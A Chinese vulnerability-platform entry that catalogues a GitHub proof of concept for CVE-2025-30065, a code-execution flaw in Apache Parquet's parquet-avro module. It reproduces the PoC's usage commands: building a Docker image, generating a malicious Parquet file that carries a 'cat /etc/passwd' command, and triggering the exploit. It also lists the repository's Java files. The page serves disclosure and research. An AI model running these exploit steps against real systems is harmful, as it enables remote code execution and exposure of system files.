漏洞平台

POC详情： 98200fadeaf89230ed0b77f89ed19f0b88470ffe

来源

https://github.com/ron-imperva/CVE-2025-30065-PoC

关联漏洞

标题： Apache Parquet 代码问题漏洞 (CVE-2025-30065)
描述：Apache Parquet是美国阿帕奇（Apache）基金会的一种列式存储格式。可用于 Hadoop 生态系统中的任何项目。 Apache Parquet 1.15.0及之前版本存在代码问题漏洞，该漏洞源于parquet-avro模块的模式解析可能导致执行任意代码。

描述

CVE-2025-30065 PoC

介绍

# CVE-2025-30065 PoC

# Usage

## Build the image
```sh
docker build -t cve-2025-30065 .
```

## Generate the malicious Parquet
```sh
docker run --rm -v $(pwd):/poc/out cve-2025-30065 generate "cat /etc/passwd" ./out/malicious.parquet
```

## Trigger the exploit
```sh
docker run --rm -v $(pwd):/poc/out cve-2025-30065 trigger ./out/malicious.parquet
```

文件快照


 [4.0K]  /data/pocs/98200fadeaf89230ed0b77f89ed19f0b88470ffe
├── [ 406]  Dockerfile
├── [4.0K]  poc
│   ├── [ 350]  entrypoint.sh
│   ├── [2.2K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           └── [4.0K]  java
│               ├── [2.2K]  GeneratePayload.java
│               ├── [1.6K]  MaliciousObject.java
│               └── [1.7K]  TriggerVuln.java
└── [ 354]  README.md

4 directories, 7 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。